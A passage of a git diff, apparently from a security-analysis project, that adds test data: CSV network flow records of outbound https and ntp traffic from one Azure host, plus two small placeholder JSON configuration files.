+606,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.505,2019-02-14 04:12:46.000,2019-02-14 04:41:20.000,2019-02-14 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '20.41.41.23', '65.55.44.108']",,,T,https,443.0,O,9.0,0.0,0.0,0.0,eastus2,eastus,20.41.41.23,9.0
+607,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.505,2019-02-14 04:12:46.000,2019-02-14 04:41:20.000,2019-02-14 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '20.41.41.23', '65.55.44.108']",,,T,https,443.0,O,9.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.108,9.0
+596,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.505,2019-02-14 04:13:00.000,2019-02-14 04:20:56.000,2019-02-14 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['52.168.138.145', '52.179.17.38']",,,U,ntp,123.0,O,2.0,0.0,0.0,0.0,eastus,eastus,52.168.138.145,2.0
+597,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.505,2019-02-14 04:13:00.000,2019-02-14 04:20:56.000,2019-02-14 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['52.168.138.145', '52.179.17.38']",,,U,ntp,123.0,O,2.0,0.0,0.0,0.0,eastus,eastus,52.179.17.38,2.0
+600,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.505,2019-02-14 04:21:03.000,2019-02-14 04:22:58.000,2019-02-14 05:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['157.55.134.142', '172.217.15.110']",,,T,https,443.0,O,2.0,0.0,0.0,0.0,,eastus,157.55.134.142,2.0
+601,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.505,2019-02-14 04:21:03.000,2019-02-14 04:22:58.000,2019-02-14 05:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['157.55.134.142', '172.217.15.110']",,,T,https,443.0,O,2.0,0.0,0.0,0.0,,eastus,172.217.15.110,2.0
+604,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.505,2019-02-14 04:22:02.000,2019-02-14 04:23:34.000,2019-02-14 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['168.62.32.212', '20.38.98.100', '52.239.152.10']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,eastus,eastus,52.239.152.10,4.0
+602,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.505,2019-02-14 04:22:02.000,2019-02-14 04:23:34.000,2019-02-14 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['168.62.32.212', '20.38.98.100', '52.239.152.10']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,eastus,eastus,168.62.32.212,4.0
+603,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.505,2019-02-14 04:22:02.000,2019-02-14 04:23:34.000,2019-02-14 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['168.62.32.212', '20.38.98.100', '52.239.152.10']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,eastus,eastus,20.38.98.100,4.0
+595,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.505,2019-02-14 04:22:14.000,2019-02-14 04:26:01.000,2019-02-14 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.232.95'],,,T,https,443.0,O,2.0,0.0,0.0,0.0,westcentralus,eastus,40.77.232.95,2.0
+592,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.490,2019-02-14 04:22:16.000,2019-02-14 04:26:02.000,2019-02-14 05:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['72.21.81.240', '13.107.4.50']",,,T,http,80.0,O,2.0,0.0,0.0,0.0,,eastus,13.107.4.50,2.0
+591,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.490,2019-02-14 04:22:16.000,2019-02-14 04:26:02.000,2019-02-14 05:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['72.21.81.240', '13.107.4.50']",,,T,http,80.0,O,2.0,0.0,0.0,0.0,,eastus,72.21.81.240,2.0
+599,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.505,2019-02-14 04:25:58.000,2019-02-14 04:56:20.000,2019-02-14 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.74.179.117', '40.77.226.250']",,,T,https,443.0,O,2.0,0.0,0.0,0.0,northeurope,eastus,40.77.226.250,2.0
+598,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.505,2019-02-14 04:25:58.000,2019-02-14 04:56:20.000,2019-02-14 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.74.179.117', '40.77.226.250']",,,T,https,443.0,O,2.0,0.0,0.0,0.0,northeurope,eastus,13.74.179.117,2.0
+588,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.490,2019-02-14 04:25:59.000,2019-02-14 04:31:26.000,2019-02-14 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.252.190', '40.91.75.5']",,,T,https,443.0,O,2.0,0.0,0.0,0.0,westus2,eastus,40.91.75.5,2.0
+587,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 05:26:11.490,2019-02-14 04:25:59.000,2019-02-14 04:31:26.000,2019-02-14 05:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.252.190', '40.91.75.5']",,,T,https,443.0,O,2.0,0.0,0.0,0.0,westus2,eastus,65.55.252.190,2.0
+609,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 06:25:54.911,2019-02-14 05:00:05.000,2019-02-14 05:57:29.000,2019-02-14 06:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,22.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,22.0
+610,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 06:25:54.911,2019-02-14 05:00:05.000,2019-02-14 05:57:29.000,2019-02-14 06:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,22.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,22.0
+613,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 06:25:54.911,2019-02-14 05:11:21.000,2019-02-14 05:26:21.000,2019-02-14 06:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.226.250'],,,T,https,443.0,O,2.0,0.0,0.0,0.0,northeurope,eastus,40.77.226.250,2.0
+611,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 06:25:54.911,2019-02-14 05:11:34.000,2019-02-14 05:51:37.000,2019-02-14 06:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.124.45.19', '13.65.107.32']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,4.0
+612,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 06:25:54.911,2019-02-14 05:11:34.000,2019-02-14 05:51:37.000,2019-02-14 06:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.124.45.19', '13.65.107.32']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,southcentralus,eastus,13.65.107.32,4.0
+608,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 06:25:54.911,2019-02-14 05:21:57.000,2019-02-14 05:21:57.000,2019-02-14 06:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.67.143.117'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,centralus,eastus,13.67.143.117,1.0
+615,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 06:25:54.911,2019-02-14 05:41:22.000,2019-02-14 05:56:22.000,2019-02-14 06:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69']",,,T,https,443.0,O,3.0,0.0,0.0,0.0,eastus2,eastus,40.77.228.69,3.0
+614,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 06:25:54.911,2019-02-14 05:41:22.000,2019-02-14 05:56:22.000,2019-02-14 06:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '40.77.228.69']",,,T,https,443.0,O,3.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,3.0
+582,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 07:25:57.928,2019-02-14 06:01:34.000,2019-02-14 06:51:34.000,2019-02-14 07:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.124.45.19', '13.65.107.32']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,southcentralus,eastus,13.65.107.32,4.0
+581,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 07:25:57.928,2019-02-14 06:01:34.000,2019-02-14 06:51:34.000,2019-02-14 07:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.124.45.19', '13.65.107.32']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,4.0
+580,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 07:25:57.928,2019-02-14 06:02:04.000,2019-02-14 06:58:50.000,2019-02-14 07:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,18.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,18.0
+579,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 07:25:57.928,2019-02-14 06:02:04.000,2019-02-14 06:58:50.000,2019-02-14 07:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,18.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,18.0
+583,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 07:25:57.943,2019-02-14 06:11:22.000,2019-02-14 06:56:22.000,2019-02-14 07:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['65.55.44.109'],,,T,https,443.0,O,4.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,4.0
+578,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 07:25:57.928,2019-02-14 06:21:57.000,2019-02-14 06:21:57.000,2019-02-14 07:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.67.143.117'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,centralus,eastus,13.67.143.117,1.0
+571,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 08:26:35.962,2019-02-14 07:00:32.000,2019-02-14 07:59:04.000,2019-02-14 08:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,17.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,17.0
+572,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 08:26:35.962,2019-02-14 07:00:32.000,2019-02-14 07:59:04.000,2019-02-14 08:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,17.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,17.0
+575,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 08:26:35.962,2019-02-14 07:02:01.000,2019-02-14 07:02:01.000,2019-02-14 08:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.232.95'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,westcentralus,eastus,40.77.232.95,1.0
+576,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 08:26:35.962,2019-02-14 07:11:23.000,2019-02-14 07:11:23.000,2019-02-14 08:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.226.250'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,northeurope,eastus,40.77.226.250,1.0
+573,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 08:26:35.962,2019-02-14 07:21:37.000,2019-02-14 07:51:54.000,2019-02-14 08:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.124.45.19', '13.65.107.32']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,4.0
+574,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 08:26:35.962,2019-02-14 07:21:37.000,2019-02-14 07:51:54.000,2019-02-14 08:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.124.45.19', '13.65.107.32']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,southcentralus,eastus,13.65.107.32,4.0
+570,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 08:26:35.962,2019-02-14 07:21:58.000,2019-02-14 07:21:58.000,2019-02-14 08:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.67.143.117'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,centralus,eastus,13.67.143.117,1.0
+577,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 08:26:35.962,2019-02-14 07:26:23.000,2019-02-14 07:56:23.000,2019-02-14 08:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['65.55.44.109'],,,T,https,443.0,O,3.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,3.0
+555,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 09:26:22.863,2019-02-14 08:03:44.000,2019-02-14 08:56:44.000,2019-02-14 09:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,17.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,17.0
+554,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 09:26:22.863,2019-02-14 08:03:44.000,2019-02-14 08:56:44.000,2019-02-14 09:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,17.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,17.0
+561,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 09:26:22.863,2019-02-14 08:11:24.000,2019-02-14 08:56:24.000,2019-02-14 09:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['65.55.44.109'],,,T,https,443.0,O,4.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,4.0
+558,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 09:26:22.863,2019-02-14 08:20:01.000,2019-02-14 08:20:01.000,2019-02-14 09:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.232.95'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,westcentralus,eastus,40.77.232.95,1.0
+556,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 09:26:22.863,2019-02-14 08:21:37.000,2019-02-14 08:51:55.000,2019-02-14 09:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.124.45.19', '13.65.107.32']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,5.0
+557,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 09:26:22.863,2019-02-14 08:21:37.000,2019-02-14 08:51:55.000,2019-02-14 09:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.124.45.19', '13.65.107.32']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,southcentralus,eastus,13.65.107.32,5.0
+553,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 09:26:22.863,2019-02-14 08:21:58.000,2019-02-14 08:21:58.000,2019-02-14 09:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.67.143.117'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,centralus,eastus,13.67.143.117,1.0
+559,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 09:26:22.863,2019-02-14 08:28:58.000,2019-02-14 08:28:58.000,2019-02-14 09:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['172.217.15.99'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,,eastus,172.217.15.99,1.0
+560,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 09:26:22.863,2019-02-14 08:32:46.000,2019-02-14 08:32:46.000,2019-02-14 09:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['20.38.98.100'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,eastus,eastus,20.38.98.100,1.0
+564,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 10:26:27.555,2019-02-14 09:01:56.000,2019-02-14 09:57:16.000,2019-02-14 10:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,19.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,19.0
+563,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 10:26:27.555,2019-02-14 09:01:56.000,2019-02-14 09:57:16.000,2019-02-14 10:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,19.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,19.0
+566,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 10:26:27.570,2019-02-14 09:11:24.000,2019-02-14 09:11:24.000,2019-02-14 10:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.226.250'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,northeurope,eastus,40.77.226.250,1.0
+565,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 10:26:27.555,2019-02-14 09:21:34.000,2019-02-14 09:51:37.000,2019-02-14 10:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.65.107.32'],,,T,https,443.0,O,2.0,0.0,0.0,0.0,southcentralus,eastus,13.65.107.32,2.0
+569,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 10:26:27.570,2019-02-14 09:21:55.000,2019-02-14 09:56:25.000,2019-02-14 10:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,40.77.228.69,5.0
+568,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 10:26:27.570,2019-02-14 09:21:55.000,2019-02-14 09:56:25.000,2019-02-14 10:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.108,5.0
+567,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 10:26:27.570,2019-02-14 09:21:55.000,2019-02-14 09:56:25.000,2019-02-14 10:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,5.0
+562,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 10:26:27.555,2019-02-14 09:21:58.000,2019-02-14 09:21:58.000,2019-02-14 10:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.67.143.117'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,centralus,eastus,13.67.143.117,1.0
+545,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 11:25:55.069,2019-02-14 10:02:33.000,2019-02-14 10:57:04.000,2019-02-14 11:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,18.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,18.0
+546,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 11:25:55.069,2019-02-14 10:02:33.000,2019-02-14 10:57:04.000,2019-02-14 11:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,18.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,18.0
+552,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 11:25:55.069,2019-02-14 10:06:55.000,2019-02-14 10:56:26.000,2019-02-14 11:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108']",,,T,https,443.0,O,6.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.108,6.0
+551,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 11:25:55.069,2019-02-14 10:06:55.000,2019-02-14 10:56:26.000,2019-02-14 11:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108']",,,T,https,443.0,O,6.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,6.0
+550,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 11:25:55.069,2019-02-14 10:11:34.000,2019-02-14 10:51:37.000,2019-02-14 11:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.124.45.19', '13.65.107.32']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,southcentralus,eastus,13.65.107.32,4.0
+549,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 11:25:55.069,2019-02-14 10:11:34.000,2019-02-14 10:51:37.000,2019-02-14 11:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.124.45.19', '13.65.107.32']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,4.0
+544,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 11:25:55.069,2019-02-14 10:21:58.000,2019-02-14 10:21:58.000,2019-02-14 11:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.67.143.117'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,centralus,eastus,13.67.143.117,1.0
+547,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 11:25:55.069,2019-02-14 10:49:04.000,2019-02-14 10:49:14.000,2019-02-14 11:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['23.4.187.27', '72.21.81.240']",,,T,http,80.0,O,3.0,0.0,0.0,0.0,,eastus,23.4.187.27,3.0
+548,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 11:25:55.069,2019-02-14 10:49:04.000,2019-02-14 10:49:14.000,2019-02-14 11:00:00.000,ExternalPublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['23.4.187.27', '72.21.81.240']",,,T,http,80.0,O,3.0,0.0,0.0,0.0,,eastus,72.21.81.240,3.0
+537,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 12:25:05.525,2019-02-14 11:00:05.000,2019-02-14 11:55:15.000,2019-02-14 12:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,16.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.128,16.0
+536,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 12:25:05.525,2019-02-14 11:00:05.000,2019-02-14 11:55:15.000,2019-02-14 12:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['13.71.172.130', '13.71.172.128']",,,T,https,443.0,O,16.0,0.0,0.0,0.0,canadacentral,eastus,13.71.172.130,16.0
+538,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 12:25:05.525,2019-02-14 11:01:34.000,2019-02-14 11:51:55.000,2019-02-14 12:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.124.45.19', '13.65.107.32']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,southcentralus,eastus,40.124.45.19,4.0
+539,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 12:25:05.525,2019-02-14 11:01:34.000,2019-02-14 11:51:55.000,2019-02-14 12:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['40.124.45.19', '13.65.107.32']",,,T,https,443.0,O,4.0,0.0,0.0,0.0,southcentralus,eastus,13.65.107.32,4.0
+541,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 12:25:05.541,2019-02-14 11:05:02.000,2019-02-14 11:56:27.000,2019-02-14 12:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.109,5.0
+542,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 12:25:05.541,2019-02-14 11:05:02.000,2019-02-14 11:56:27.000,2019-02-14 12:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,65.55.44.108,5.0
+543,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 12:25:05.541,2019-02-14 11:05:02.000,2019-02-14 11:56:27.000,2019-02-14 12:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,"['65.55.44.109', '65.55.44.108', '40.77.228.69']",,,T,https,443.0,O,5.0,0.0,0.0,0.0,eastus2,eastus,40.77.228.69,5.0
+540,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 12:25:05.541,2019-02-14 11:11:26.000,2019-02-14 11:11:26.000,2019-02-14 12:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.226.250'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,northeurope,eastus,40.77.226.250,1.0
+535,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 12:25:05.525,2019-02-14 11:21:58.000,2019-02-14 11:21:58.000,2019-02-14 12:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.67.143.117'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,centralus,eastus,13.67.143.117,1.0
+0,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 13:23:59.512,2019-02-14 12:21:58.000,2019-02-14 12:21:58.000,2019-02-14 13:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['13.67.143.117'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,centralus,eastus,13.67.143.117,1.0
+1,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-14 13:23:59.512,2019-02-14 12:29:02.000,2019-02-14 12:29:02.000,2019-02-14 13:00:00.000,AzurePublic,asihuntomsworkspacerg,msticalertswin1,10.0.3.5,['40.77.232.95'],,,T,https,443.0,O,1.0,0.0,0.0,0.0,westcentralus,eastus,40.77.232.95,1.0
diff --git a/tests/testdata/config-no-settings.json b/tests/testdata/config-no-settings.json
new file mode 100644
index 000000000..c9f68f3fa
--- /dev/null
+++ b/tests/testdata/config-no-settings.json
@@ -0,0 +1,7 @@
+{
+  "tenant_id": "",
+  "subscription_id": "",
+  "resource_group": "",
+  "workspace_id": "",
+  "workspace_name": ""
+}
\ No newline at end of file
diff --git a/tests/testdata/config.json b/tests/testdata/config.json
new file mode 100644
index 000000000..785eef01a
--- /dev/null
+++ b/tests/testdata/config.json
@@ -0,0 +1,7 @@
+{
+  "tenant_id": "99928fd7-42a5-48bc-a619-af56397b9f28",
+  "subscription_id": "My Sub Id",
+  "resource_group": "OMSWorkspaceRG",
+  "workspace_id": "9997809c-8142-43e1-96b3-4ad87cfe95a3",
+  "workspace_name": "OMSWorkspace"
+}
\ No newline at end of file
diff --git a/tests/testdata/data_q_hierarchy.yaml b/tests/testdata/data_q_hierarchy.yaml
new file mode 100644
index 000000000..26341d893
--- /dev/null
